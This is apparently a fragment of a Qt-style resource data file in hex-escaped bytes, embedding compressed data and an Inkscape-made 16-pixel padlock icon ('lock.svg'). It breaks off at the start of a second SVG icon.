\x46\x88\xb0\xab\x1e\xc2\x64\x15\xfe\xc6\x06\x78\x27\x92\xa7\xd3\
\xab\xa9\xb0\x70\xb3\x22\x46\x46\xb2\x7e\xb2\x5e\x70\xde\x98\x81\
\x49\x97\x35\x2c\x51\x88\x09\xa3\xae\xef\x46\x50\x42\x5f\x6e\x53\
\x0a\x7b\xe7\x46\x44\x16\x65\x41\x60\x4f\xfb\x04\xe8\xc2\x86\xad\
\xe6\xea\xdd\x14\xba\x72\xff\x55\x01\xc9\xc2\x86\x02\x30\x1f\xe4\
\x0c\xc1\x0d\x2d\xf2\x98\xac\xb8\x52\xe9\x5f\x5d\x64\xcf\x2d\x27\
\xb1\xe9\x71\xd2\x61\xb2\xb8\x74\x70\x69\x48\x0d\x43\xb2\x18\x5d\
\xc2\xfb\xe0\x31\x58\xe8\x98\x66\x46\x83\xec\x0b\x2a\x65\xac\xd0\
\x58\x10\x67\x2a\x23\xf5\x22\x6f\xf4\x0d\x8b\xd0\x7e\x00\xaf\x6e\
\x24\xaf\xc4\xd1\x4c\x4a\x71\xd8\x5f\x5a\xfa\x35\x3c\xee\xf5\x03\
\xec\x31\x35\x49\xc9\x30\x36\x2d\x26\x61\xef\x89\x83\x27\xad\x20\
\x9b\xd2\x34\x30\xf4\x17\xa3\x03\xae\xc2\x54\xd1\x44\x0b\x1d\x82\
\x3d\xb3\x1a\x84\x53\x7e\xb4\xd7\x87\x1c\x65\x74\x51\x7f\x88\xe0\
\xbd\x0f\x99\xcb\x0c\x99\xda\x13\x3e\x17\x0e\xaf\x72\x11\x30\xf4\
\xf8\xb8\x07\xae\xaa\x85\xa7\x55\x54\x00\x17\x86\x4a\xaa\xfd\x69\
\xf9\x42\xfb\x9b\x09\x47\x33\xb2\x90\xee\x42\x34\x7a\x72\x17\x46\
\x2c\x17\xfa\x1c\x7d\x79\x29\x47\xd8\xbb\x71\x84\x29\x05\x48\xe5\
\xc4\x9b\x50\x78\x0b\x28\x0c\x01\xcb\x4d\x32\xd0\x8f\x7a\xd8\x07\
\xa8\xe4\x67\x20\xbc\x95\xc7\x8f\x72\x85\xc0\x0c\xce\x90\xcf\x49\
\x38\x43\x60\x06\x4d\x18\xc9\xd5\x0d\x04\x06\x97\x80\xc0\x52\x53\
\x03\xf0\x93\x6c\xe2\x50\xd5\x1d\x16\x85\xf3\x45\xe7\xf8\xab\x1c\
\x79\x7e\xf0\x72\x0a\x17\x4c\x85\x1b\xee\x3a\xcf\x5d\x4b\x08\x25\
\xff\x8b\x6b\xc9\x6c\x47\xfe\x3f\xee\x27\x36\xf9\xca\x0d\xa5\x44\
\xb2\x77\x43\x02\xdd\xb7\xa0\x3e\xe6\x24\xe2\xcf\xd0\x1b\xd3\xf4\
\x66\xca\x46\xd6\x30\xc8\xcd\xd3\xdc\x16\x4c\x24\xc6\x4d\x7e\x32\
\x84\xa3\x2b\x3e\xe3\xb5\x70\x22\xb6\x99\x70\x32\xd3\xac\x36\x91\
\x9a\x1f\x4e\x0c\x86\xe6\x26\xbd\xec\x39\x52\xe3\x26\xa9\xf1\x9e\
\xd4\xd8\x4c\x32\x12\x87\xc1\x67\x7c\x4e\x67\x1c\xcd\xd5\x47\x99\
\xa6\xcd\x9b\x64\xc6\x0d\x2e\xeb\xe9\x61\x22\xac\x6b\x24\x66\x70\
\x18\x7b\x86\xbe\x02\x4d\x5f\x73\xd9\x48\xc8\x3d\x79\x85\x9a\xb8\
\xdc\x69\x76\xc6\x3f\x33\xe1\x15\xda\xe2\x23\x6d\xf1\xb9\x6c\x30\
\x3a\x27\x2d\x6f\xa1\x43\x38\xd7\x7e\x41\xc8\x17\xdd\xa0\x2c\x1f\
\x98\xc2\xe5\x6e\x10\xc9\x73\xe9\x47\x9c\x6b\xce\x0a\x28\x30\x89\
\xec\xe4\x50\xde\xe3\x23\x38\x14\x3e\xe1\x84\x02\x8f\x44\x38\x08\
\x89\x1b\xc8\xef\x06\x0e\x9d\x12\x81\x78\x6c\xf6\x60\x2a\x95\xaa\
\xb8\xaa\xa2\xaa\x85\x6a\x01\x8a\x03\x75\x8a\xa4\x82\xcf\x55\x2d\
\x35\x59\xa9\xd5\x3c\x37\x82\x68\xe4\x37\x0b\xb0\xa4\x2b\x71\xe2\
\x9d\x8e\xf1\xc5\x7c\x2c\xc0\xe7\xde\x8d\x9b\x86\x8b\x03\x4e\xb8\
\xcf\x2f\xe1\x94\x6b\x34\xf5\x2e\xc1\xd4\xbb\x81\xa5\xfc\x0a\x94\
\x7a\xd7\x90\xd4\x04\xd2\x2b\x30\xfa\x35\x10\xe5\x97\x10\x7a\x1b\
\x40\x4d\xfc\xbc\x80\xcf\x6f\x43\xcf\x4b\xf0\x34\x3e\x04\xf8\x1c\
\x3a\xf9\xb7\x20\x27\xbf\x01\x9c\x9e\xc6\x4d\x7e\x09\x9b\xfc\xab\
\xa8\x79\x05\x34\xf9\x35\xcc\x34\x21\xf3\x0a\x62\x3e\x0f\x98\x97\
\x78\xf9\xf2\xe0\xd2\x77\xcf\x2f\x8a\xea\xcf\x52\xfe\xcf\xf2\xe1\
\xee\xdf\xfd\xc3\x1d\x1c\
\x00\x00\x0d\x5e\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\
\x70\x78\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\
\x36\x70\x78\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\
\x22\x30\x20\x30\x20\x31\x36\x20\x31\x36\x22\x0a\x20\x20\x20\x76\
\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\
\x69\x64\x3d\x22\x53\x56\x47\x52\x6f\x6f\x74\x22\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x30\x2e\x39\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\
\x22\x6c\x6f\x63\x6b\x2e\x73\x76\x67\x22\x3e\x0a\x20\x20\x3c\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6e\x61\x6d\x65\x64\x76\x69\x65\
\x77\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x62\x61\x73\x65\x22\
\x0a\x20\x20\x20\x20\x20\x70\x61\x67\x65\x63\x6f\x6c\x6f\x72\x3d\
\x22\x23\x66\x66\x66\x66\x66\x66\x22\x0a\x20\x20\x20\x20\x20\x62\
\x6f\x72\x64\x65\x72\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x36\x36\x36\
\x36\x36\x36\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\
\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x31\x2e\x30\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\
\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\x2e\x30\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\
\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\x22\x33\
\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x63\x78\x3d\x22\x32\x2e\x34\x33\x38\x35\x38\x34\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x79\x3d\
\x22\x38\x2e\x34\x36\x32\x32\x30\x35\x39\x22\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\x6d\x65\
\x6e\x74\x2d\x75\x6e\x69\x74\x73\x3d\x22\x70\x78\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\x72\x72\
\x65\x6e\x74\x2d\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\x65\x72\
\x31\x22\x0a\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\x69\x64\
\x3d\x22\x66\x61\x6c\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x77\x69\
\x64\x74\x68\x3d\x22\x31\x34\x34\x30\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\
\x68\x65\x69\x67\x68\x74\x3d\x22\x38\x34\x34\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\
\x77\x2d\x78\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\x3d\x22\
\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\x7a\x65\
\x64\x3d\x22\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\
\x61\x70\x65\x3a\x67\x72\x69\x64\x2d\x62\x62\x6f\x78\x3d\x22\x74\
\x72\x75\x65\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x64\x65\x66\x73\x0a\
\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\x31\x30\x22\
\x20\x2f\x3e\x0a\x20\x20\x3c\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\
\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6d\x65\x74\x61\x64\x61\x74\
\x61\x31\x33\x22\x3e\x0a\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\
\x44\x46\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x63\x63\x3a\x57\x6f\
\x72\x6b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\
\x61\x62\x6f\x75\x74\x3d\x22\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x69\x6d\x61\
\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\x3c\x2f\x64\x63\x3a\x66\
\x6f\x72\x6d\x61\x74\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\
\x64\x63\x3a\x74\x79\x70\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x72\x64\x66\x3a\x72\x65\x73\x6f\x75\x72\x63\x65\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\
\x2f\x64\x63\x2f\x64\x63\x6d\x69\x74\x79\x70\x65\x2f\x53\x74\x69\
\x6c\x6c\x49\x6d\x61\x67\x65\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x20\x2f\x3e\
\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\x63\x3a\x57\x6f\x72\x6b\
\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\x3e\
\x0a\x20\x20\x3c\x2f\x6d\x65\x74\x61\x64\x61\x74\x61\x3e\x0a\x20\
\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\
\x65\x72\x22\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6c\x61\x79\
\x65\x72\x33\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\x45\x62\x65\x6e\x65\x20\
\x33\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\
\x69\x64\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\x6d\
\x6f\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\
\x22\x45\x62\x65\x6e\x65\x20\x31\x22\x3e\x0a\x20\x20\x20\x20\x3c\
\x72\x65\x63\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\
\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x30\x30\x35\x35\x64\x34\x3b\
\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x31\x2e\x32\x39\
\x35\x35\x32\x35\x30\x37\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x72\x65\x63\x74\x32\x36\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x33\x2e\x31\x38\x37\x35\
\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\
\x22\x39\x2e\x34\x31\x30\x39\x36\x32\x31\x22\x0a\x20\x20\x20\x20\
\x20\x20\x20\x78\x3d\x22\x31\x2e\x35\x33\x31\x32\x35\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x79\x3d\x22\x36\x2e\x31\x38\x32\x37\x38\
\x37\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x72\x79\x3d\x22\x31\
\x2e\x36\x36\x38\x39\x33\x39\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\
\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\
\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x6e\x6f\x6e\x65\x3b\x66\x69\
\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\
\x6f\x6b\x65\x3a\x23\x30\x30\x35\x35\x64\x34\x3b\x73\x74\x72\x6f\
\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x32\x2e\x33\x37\x38\x39\x39\
\x39\x39\x35\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\x69\x74\x65\x72\
\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\
\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\
\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x39\
\x35\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\
\x6f\x64\x69\x3a\x74\x79\x70\x65\x3d\x22\x61\x72\x63\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x63\
\x78\x3d\x22\x38\x2e\x30\x39\x34\x36\x31\x30\x32\x22\x0a\x20\x20\
\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x63\x79\
\x3d\x22\x34\x2e\x39\x32\x34\x30\x31\x34\x31\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x72\x78\x3d\
\x22\x34\x2e\x30\x37\x31\x38\x34\x32\x32\x22\x0a\x20\x20\x20\x20\
\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x72\x79\x3d\x22\
\x33\x2e\x31\x31\x34\x36\x30\x38\x38\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x73\x74\x61\x72\x74\
\x3d\x22\x33\x2e\x31\x33\x33\x34\x36\x30\x35\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x65\x6e\x64\
\x3d\x22\x33\x2e\x31\x33\x32\x38\x32\x33\x31\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x64\x3d\x22\x4d\x20\x34\x2e\x30\x32\x32\x39\x30\
\x32\x37\x2c\x34\x2e\x39\x34\x39\x33\x34\x32\x33\x20\x41\x20\x34\
\x2e\x30\x37\x31\x38\x34\x32\x32\x2c\x33\x2e\x31\x31\x34\x36\x30\
\x38\x38\x20\x30\x20\x30\x20\x31\x20\x38\x2e\x30\x36\x30\x38\x34\
\x38\x39\x2c\x31\x2e\x38\x30\x39\x35\x31\x32\x34\x20\x34\x2e\x30\
\x37\x31\x38\x34\x32\x32\x2c\x33\x2e\x31\x31\x34\x36\x30\x38\x38\
\x20\x30\x20\x30\x20\x31\x20\x31\x32\x2e\x31\x36\x36\x33\x30\x37\
\x2c\x34\x2e\x38\x39\x37\x36\x39\x33\x33\x20\x34\x2e\x30\x37\x31\
\x38\x34\x32\x32\x2c\x33\x2e\x31\x31\x34\x36\x30\x38\x38\x20\x30\
\x20\x30\x20\x31\x20\x38\x2e\x31\x32\x39\x36\x36\x39\x32\x2c\x38\
\x2e\x30\x33\x38\x35\x30\x37\x34\x20\x34\x2e\x30\x37\x31\x38\x34\
\x32\x32\x2c\x33\x2e\x31\x31\x34\x36\x30\x38\x38\x20\x30\x20\x30\
\x20\x31\x20\x34\x2e\x30\x32\x32\x39\x32\x34\x36\x2c\x34\x2e\x39\
\x35\x31\x33\x32\x37\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6f\x70\x65\x6e\x3d\x22\x74\x72\
\x75\x65\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\x20\x20\
\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x67\x72\x6f\x75\x70\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\x65\
\x72\x22\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\
\x72\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\x45\x62\x65\x6e\x65\x20\x32\
\x22\x3e\x0a\x20\x20\x20\x20\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\
\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\
\x23\x66\x66\x66\x66\x66\x66\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\
\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\
\x31\x2e\x35\x30\x34\x32\x37\x37\x31\x31\x3b\x73\x74\x72\x6f\x6b\
\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x38\x35\x33\x22\
\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\
\x3a\x74\x79\x70\x65\x3d\x22\x61\x72\x63\x22\x0a\x20\x20\x20\x20\
\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x63\x78\x3d\x22\
\x38\x2e\x30\x37\x34\x32\x39\x31\x32\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x63\x79\x3d\x22\x38\
\x2e\x38\x34\x33\x35\x38\x32\x32\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x72\x78\x3d\x22\x31\x2e\
\x38\x31\x35\x38\x36\x37\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x72\x79\x3d\x22\x31\x2e\x37\
\x31\x35\x38\x39\x33\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x73\x74\x61\x72\x74\x3d\x22\x33\
\x2e\x31\x34\x31\x35\x39\x32\x37\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x65\x6e\x64\x3d\x22\x32\
\x2e\x38\x32\x30\x34\x36\x30\x33\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x64\x3d\x22\x4d\x20\x36\x2e\x32\x35\x38\x34\x32\x33\x33\x2c\
\x38\x2e\x38\x34\x33\x35\x38\x32\x31\x20\x41\x20\x31\x2e\x38\x31\
\x35\x38\x36\x37\x39\x2c\x31\x2e\x37\x31\x35\x38\x39\x33\x39\x20\
\x30\x20\x30\x20\x31\x20\x37\x2e\x39\x32\x38\x36\x36\x34\x34\x2c\
\x37\x2e\x31\x33\x33\x32\x31\x35\x31\x20\x31\x2e\x38\x31\x35\x38\
\x36\x37\x39\x2c\x31\x2e\x37\x31\x35\x38\x39\x33\x39\x20\x30\x20\
\x30\x20\x31\x20\x39\x2e\x38\x36\x36\x38\x30\x31\x35\x2c\x38\x2e\
\x35\x36\x39\x32\x35\x20\x31\x2e\x38\x31\x35\x38\x36\x37\x39\x2c\
\x31\x2e\x37\x31\x35\x38\x39\x33\x39\x20\x30\x20\x30\x20\x31\x20\
\x38\x2e\x35\x30\x37\x34\x32\x35\x36\x2c\x31\x30\x2e\x35\x30\x39\
\x39\x34\x38\x20\x31\x2e\x38\x31\x35\x38\x36\x37\x39\x2c\x31\x2e\
\x37\x31\x35\x38\x39\x33\x39\x20\x30\x20\x30\x20\x31\x20\x36\x2e\
\x33\x35\x31\x32\x35\x33\x2c\x39\x2e\x33\x38\x35\x31\x38\x39\x22\
\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\
\x3a\x6f\x70\x65\x6e\x3d\x22\x74\x72\x75\x65\x22\x20\x2f\x3e\x0a\
\x20\x20\x20\x20\x3c\x72\x65\x63\x74\x0a\x20\x20\x20\x20\x20\x20\
\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x66\x66\
\x66\x66\x66\x66\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\
\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\x6e\x65\x3b\
\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\x2e\x37\
\x39\x33\x36\x35\x33\x37\x33\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\
\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x69\x64\x3d\x22\x72\x65\x63\x74\x31\x36\x38\x35\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x2e\x32\
\x34\x38\x38\x33\x35\x34\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x68\
\x65\x69\x67\x68\x74\x3d\x22\x34\x2e\x30\x38\x34\x32\x31\x34\x32\
\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x78\x3d\x22\x37\x2e\x34\x39\
\x31\x34\x36\x32\x32\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x79\x3d\
\x22\x31\x30\x2e\x33\x34\x34\x30\x30\x36\x22\x20\x2f\x3e\x0a\x20\
\x20\x3c\x2f\x67\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x0a\xe9\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
